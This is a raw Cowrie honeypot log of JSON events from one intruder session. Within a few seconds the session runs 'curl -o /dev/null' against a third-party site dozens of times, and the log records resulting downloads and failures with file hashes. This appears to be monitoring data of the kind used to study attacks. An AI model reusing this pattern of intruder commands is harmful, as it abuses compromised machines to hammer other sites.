{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.883938Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.888137Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.888929Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.926133Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.927077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.964554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.965527Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.002381Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.003510Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.042245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.043218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.080673Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.081923Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/65c9aa0175efa32a89429c131ddfbdd93cf8bd966181750b4e4a6359ef6f07f6","shasum":"65c9aa0175efa32a89429c131ddfbdd93cf8bd966181750b4e4a6359ef6f07f6","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.086360Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 65c9aa0175efa32a89429c131ddfbdd93cf8bd966181750b4e4a6359ef6f07f6 to var/lib/cowrie/downloads/65c9aa0175efa32a89429c131ddfbdd93cf8bd966181750b4e4a6359ef6f07f6","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.129824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.130923Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.168202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.169084Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.179410Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.206453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.207575Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.248774Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.249753Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.287113Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.288349Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.300455Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.328594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.329544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.368064Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.369133Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.408902Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.410024Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.449466Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.450620Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.488659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.489932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.541630Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.543335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.582941Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.584232Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/65c9aa0175efa32a89429c131ddfbdd93cf8bd966181750b4e4a6359ef6f07f6","shasum":"65c9aa0175efa32a89429c131ddfbdd93cf8bd966181750b4e4a6359ef6f07f6","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.625389Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 65c9aa0175efa32a89429c131ddfbdd93cf8bd966181750b4e4a6359ef6f07f6 to var/lib/cowrie/downloads/65c9aa0175efa32a89429c131ddfbdd93cf8bd966181750b4e4a6359ef6f07f6","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.627719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.629831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.678612Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.716543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.718535Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.757575Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.759085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.818061Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.819440Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.860059Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.861505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.865637Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.904843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.906111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:01.945540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:01.947663Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.014928Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.026011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.028241Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.041870Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.080835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.081968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.130105Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.131601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.171279Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.173019Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.211145Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.212421Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.252038Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.252873Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/00b8a1f87bb00968cb762bc29b59189c8535fe4b961899b9cf132963982505ef","shasum":"00b8a1f87bb00968cb762bc29b59189c8535fe4b961899b9cf132963982505ef","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.283737Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 00b8a1f87bb00968cb762bc29b59189c8535fe4b961899b9cf132963982505ef to var/lib/cowrie/downloads/00b8a1f87bb00968cb762bc29b59189c8535fe4b961899b9cf132963982505ef","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.292798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.293832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.317209Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.333582Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.334726Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.373741Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.374753Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.412210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.413198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.451756Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.453028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.459014Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.503525Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.504507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.541608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.542653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.580004Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.581231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.619408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.620306Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.660297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.661890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.686644Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.701307Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.702433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.741719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.742741Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.780372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.781308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.819651Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.820647Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.860330Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.861532Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.910231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.911162Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.948659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.949632Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:02.989461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:02.990415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.029080Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.030454Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.068692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.069669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.107640Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.109835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.110883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.149319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
